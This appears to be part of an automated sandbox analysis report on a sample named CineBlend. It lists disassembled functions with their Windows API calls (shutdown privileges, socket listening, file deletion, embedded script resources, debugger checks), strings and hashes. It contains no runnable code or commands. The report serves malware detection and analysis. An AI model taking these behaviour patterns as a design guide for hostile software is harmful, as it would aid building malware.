Instruction Fuzzy Hash: 70418934605602EFE310CF25DC98B69BBE4FF44318F14C4A9E8698B662DB75ED42CB90

Function 00BAF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA205A
Part of subcall function 00BA2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA2087
Part of subcall function 00BA2010: GetLastError.KERNEL32 ref: 00BA2097

ExitWindowsEx.USER32(?,00000000), ref: 00BAF249

Strings

@, xrefs: 00BAF23C
, xrefs: 00BAF273
, xrefs: 00BAF237
SeShutdownPrivilege, xrefs: 00BAF219

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 281b259abdde13bd11bb4b615d2c04e9ebc7b2907fc64c6fea01729b3bf26a58
Instruction ID: 2d0b8ad9606127273d691b67c98f39239d5e5236b8239ef09563c846a8cc098d
Opcode Fuzzy Hash: 281b259abdde13bd11bb4b615d2c04e9ebc7b2907fc64c6fea01729b3bf26a58
Instruction Fuzzy Hash: 8D01267A6193116BEB2823F89CCABFAB3ECDB0A344F1005B2FD03E30D1E9609C009190

Function 00BC1C61 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BC1CD3
WSAGetLastError.WSOCK32 ref: 00BC1CE0
bind.WSOCK32(00000000,?,00000010), ref: 00BC1D17
WSAGetLastError.WSOCK32 ref: 00BC1D22
closesocket.WSOCK32(00000000), ref: 00BC1D51
listen.WSOCK32(00000000,00000005), ref: 00BC1D60
WSAGetLastError.WSOCK32 ref: 00BC1D6A
closesocket.WSOCK32(00000000), ref: 00BC1D99

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 3deb8c5b748f570b93012224a2dddc540467c36f464b002289c78beefce791da
Instruction ID: 20ce64ba90a2b4b7341fe8137c2557ffd688bbd06f01c79a872904e815bccaad
Opcode Fuzzy Hash: 3deb8c5b748f570b93012224a2dddc540467c36f464b002289c78beefce791da
Instruction Fuzzy Hash: A1414B31A00100AFD710DF28C494B6ABBE5EB46318F1885DDE8569F293C771ED81DBE1

Function 00B7BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B7BD54
_free.LIBCMT ref: 00B7BD78
_free.LIBCMT ref: 00B7BEFF
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE46D0), ref: 00B7BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,00C1221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B7BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,00C12270,000000FF,?,0000003F,00000000,?), ref: 00B7BFB6
_free.LIBCMT ref: 00B7C0CB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: a91272cf12d24c7ffe5f03373f8579fef5fb9ac435418c30d16a2f75ce99bb42
Instruction ID: c96a069c59492d5b5e4c2e4221bb3d30d7c81be57dd56aef6eadf2a82e76a515
Opcode Fuzzy Hash: a91272cf12d24c7ffe5f03373f8579fef5fb9ac435418c30d16a2f75ce99bb42
Instruction Fuzzy Hash: F3C1E6759002059FDB249F689C41FEEBBF9EF42320F14C5EAE5A99B291E7308E418F50

Function 00BADC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B455D1,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B45871

Part of subcall function 00BAEAB0: GetFileAttributesW.KERNEL32(?,00BAD840), ref: 00BAEAB1

FindFirstFileW.KERNEL32(?,?), ref: 00BADCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00BADD1B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00BADD2C
FindClose.KERNEL32(00000000), ref: 00BADD43
FindClose.KERNEL32(00000000), ref: 00BADD4C

Strings

\*.*, xrefs: 00BADC9D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 18ed141249e6b5c8ee33415ca15c79abec2fb3bbf2127d19740d67c82420e055
Instruction ID: 9c5040c571c95493e2fb9598866a219ba07c2c4dcf7cc56f561c927ec7bb8a3f
Opcode Fuzzy Hash: 18ed141249e6b5c8ee33415ca15c79abec2fb3bbf2127d19740d67c82420e055
Instruction Fuzzy Hash: 9E316C3100D345ABC305EF64C8958AFB7E8BE96310F404EADF5E693191EB21DA09DB63

Function 00BB3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B856C2,?,?,00000000,00000000), ref: 00BB3A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B856C2,?,?,00000000,00000000), ref: 00BB3A35
LoadResource.KERNEL32(?,00000000,?,?,00B856C2,?,?,00000000,00000000,?,?,?,?,?,?,00B466CE), ref: 00BB3A45
SizeofResource.KERNEL32(?,00000000,?,?,00B856C2,?,?,00000000,00000000,?,?,?,?,?,?,00B466CE), ref: 00BB3A56
LockResource.KERNEL32(00B856C2,?,?,00B856C2,?,?,00000000,00000000,?,?,?,?,?,?,00B466CE,?), ref: 00BB3A65

Strings

SCRIPT, xrefs: 00BB3A2B

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: ecf7d375fe893d509ac0e4dc5e5e017f381076a236ba178551fb073332b70575
Instruction ID: 3681c44fd6f046485947ef30c75ec38797af8fb7c6847bcf6359b901bf082a2d
Opcode Fuzzy Hash: ecf7d375fe893d509ac0e4dc5e5e017f381076a236ba178551fb073332b70575
Instruction Fuzzy Hash: D8113C71201701BFD7218B65DC58F6BBBFDEBC5B51F2442ADB48297190EBB1E9058A30

Function 00BA20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA1916
Part of subcall function 00BA1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA1922
Part of subcall function 00BA1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA1931
Part of subcall function 00BA1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BA1938
Part of subcall function 00BA1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA194E

GetLengthSid.ADVAPI32(?,00000000,00BA1C81), ref: 00BA20FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BA2107
HeapAlloc.KERNEL32(00000000), ref: 00BA210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00BA2127
GetProcessHeap.KERNEL32(00000000,00000000,00BA1C81), ref: 00BA213B
HeapFree.KERNEL32(00000000), ref: 00BA2142

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: aab7cd8d399e419bdc88b3a31dcccde2dcdc9d1e1d603c7a9c140812965f1602
Instruction ID: 4459d9893c725903df467a0149bc7c05e34022dcc6b6ff968d99e0f4d242aa50
Opcode Fuzzy Hash: aab7cd8d399e419bdc88b3a31dcccde2dcdc9d1e1d603c7a9c140812965f1602
Instruction Fuzzy Hash: 1711D071605205FFDB109F68CC19FAFBBB9EF46356F148099EA81A7120DB359941CB60

Function 00BBA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00BBA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00BBA6D0

Part of subcall function 00BB42B9: GetInputState.USER32 ref: 00BB4310
Part of subcall function 00BB42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00BBA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00BBA6BA

Strings

*.*, xrefs: 00BBA5A2

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 6c38ab7b3a959e9e9deb50705f66556b11d8dbe559e34ebfed6b46b2d560544b
Instruction ID: c4b0436cf52ce42a277be109b8a49b796546d2c40794ec9e9a07d4dd5894ecf6
Opcode Fuzzy Hash: 6c38ab7b3a959e9e9deb50705f66556b11d8dbe559e34ebfed6b46b2d560544b
Instruction Fuzzy Hash: 3E4130B1D0120AAFCF15DFA4C84AAEEBBF4EF15310F144096E945A21A1EB719F44DF61

Function 00B422AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00B4233E
GetSysColor.USER32(0000000F), ref: 00B42421
SetBkColor.GDI32(?,00000000), ref: 00B42434

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 144d968de89cfc9e001c8ce18c2e1d06794895ca12ff9531f1ae820ac86608a3
Instruction ID: adb5196cc72e2ccc2e3dd415c5cf0128d5adf1f60f3eaf9d6b96ea3d4598c45f
Opcode Fuzzy Hash: 144d968de89cfc9e001c8ce18c2e1d06794895ca12ff9531f1ae820ac86608a3
Instruction Fuzzy Hash: 7D81F2B0114410BEE6297B2C8CD8E7F29EEEB42B04F5501DAF502C66A5D959CF42F37A

Function 00BC2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BC3AD7
Part of subcall function 00BC3AAB: _wcslen.LIBCMT ref: 00BC3AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BC22BA
WSAGetLastError.WSOCK32 ref: 00BC22E1
bind.WSOCK32(00000000,?,00000010), ref: 00BC2338
WSAGetLastError.WSOCK32 ref: 00BC2343
closesocket.WSOCK32(00000000), ref: 00BC2372

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 578f32622039b22317b92c59b75bcf1b8fd11e177430f0bfb7f59cfd2a10401c
Instruction ID: 34de8d55056887dd621687ea2599ffab5ec85f54d78cfd4e7c52e5539acefdc5
Opcode Fuzzy Hash: 578f32622039b22317b92c59b75bcf1b8fd11e177430f0bfb7f59cfd2a10401c
Instruction Fuzzy Hash: 1E51BE75A00200AFE710AF24C886F2A77E5EB45714F0884DCF9459F383DB71AD429BA1

Function 00BD26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00BD275C
IsWindowEnabled.USER32 ref: 00BD276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00BD2777
IsIconic.USER32 ref: 00BD2785
IsZoomed.USER32 ref: 00BD2793

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 9ed925f177201fc3af6a0371ddb580f37dfc202fe78393d2f5daf5f23f172845
Instruction ID: e5d1d133b1db9e155a89bd9b31c70def8d54b8f09ecb0bfe45f30d1e17821ff2
Opcode Fuzzy Hash: 9ed925f177201fc3af6a0371ddb580f37dfc202fe78393d2f5daf5f23f172845
Instruction Fuzzy Hash: E32127317012408FE7219F26D844B1AFBE4FFA5314F1980AEE8498B351EB71DD42CB90

Function 00BBD889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00BBD8CE
GetLastError.KERNEL32(?,00000000), ref: 00BBD92F
SetEvent.KERNEL32(?,?,00000000), ref: 00BBD943

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: d8bfe4c9c95ba7abb86bfe28a41cd4d04bc1c1506272e2fa18884e1330d129ff
Instruction ID: 7aa9c4224a8865783d0057aab2ab524ad5a77bc8fefdf2bb3cea458b7153d528
Opcode Fuzzy Hash: d8bfe4c9c95ba7abb86bfe28a41cd4d04bc1c1506272e2fa18884e1330d129ff
Instruction Fuzzy Hash: 8A2190B5900705EFE7309F65CC88BAAB7F8EF40314F1044AAE68692151FBB8EA04DB50

Function 00BAE472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00B846AC), ref: 00BAE482
GetFileAttributesW.KERNEL32(?), ref: 00BAE491
FindFirstFileW.KERNEL32(?,?), ref: 00BAE4A2
FindClose.KERNEL32(00000000), ref: 00BAE4AE

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: d60081f92283408d6da45b2a6251dd20d61cca9b004ecdc3b0fe2e89a8afd73a
Instruction ID: d882198f74e6783e4b53511ecaee0d5d576c53e53f856e0a7b84427370c8c2c4
Opcode Fuzzy Hash: d60081f92283408d6da45b2a6251dd20d61cca9b004ecdc3b0fe2e89a8afd73a
Instruction Fuzzy Hash: 49F0A030419A205792106B38EC0D8AEB7ADEE07335B504B92F8B6C22E0EF78D9958695

Function 00B9E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B9E5F8

Strings

X64, xrefs: 00B9E680
%.3d, xrefs: 00B9E603

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 5bc5361b396abbc7ae1a43da5a44ce56372a83a9fcb6cf04271c220d8ca46e13
Instruction ID: 1c48170ef447b879645c422b59bc50550bb33efe0f02f191c4dee5c746277910
Opcode Fuzzy Hash: 5bc5361b396abbc7ae1a43da5a44ce56372a83a9fcb6cf04271c220d8ca46e13
Instruction Fuzzy Hash: 5ED012B1C04108D6DF80DB90DDC9DB9B3FCBB18701F1084F2F95691040FA20D9089B21

Function 00B72992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B72A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B72A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B72AA1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5d267988710f0a686a7122249a026f109a8fdd6fe4f633c7b952b9185f9f7dfd
Instruction ID: 13ac0f8345b5b09cb2d726584f26493f8a1cfdb77706617011565cbcacbec08d
Opcode Fuzzy Hash: 5d267988710f0a686a7122249a026f109a8fdd6fe4f633c7b952b9185f9f7dfd
Instruction Fuzzy Hash: FF31B7759012189BCB21DF68D98979DBBF8AF18310F5042EAE81CA7251E7349F858F45

Function 00BA2010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00B6014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B609D8
Part of subcall function 00B6014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00B609F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA2087
GetLastError.KERNEL32 ref: 00BA2097

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: db331141a8da8668562b6d3cfd10da0537606a476c4c15d22832bb9a4a8e118e
Instruction ID: 4abf694a424a0a1e894fc7bfd5e1091735d34cdfeb09dc478c2df07afe1d7659
Opcode Fuzzy Hash: db331141a8da8668562b6d3cfd10da0537606a476c4c15d22832bb9a4a8e118e
Instruction Fuzzy Hash: D911C1B2414705AFD728AF54DCC6D6BB7F8EB45710B20845EF04653251EB70BC41CA24

Function 00B9E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00B9E664

Strings

X64, xrefs: 00B9E680

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 8bc19ecfcae344d8a7a41e7543db11ffd691747a7c9a425f4a2fe4c46e0dd930
Instruction ID: 9236f112101134e3996b8d206697f56a05651defdd2c2e362782a60f8403bb04
Opcode Fuzzy Hash: 8bc19ecfcae344d8a7a41e7543db11ffd691747a7c9a425f4a2fe4c46e0dd930
Instruction Fuzzy Hash: B4D0C9F480111DEADF80CB50ECC8EDDB3BCBB04304F1006A2F546A2100DB3096488B10

Function 00BB41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

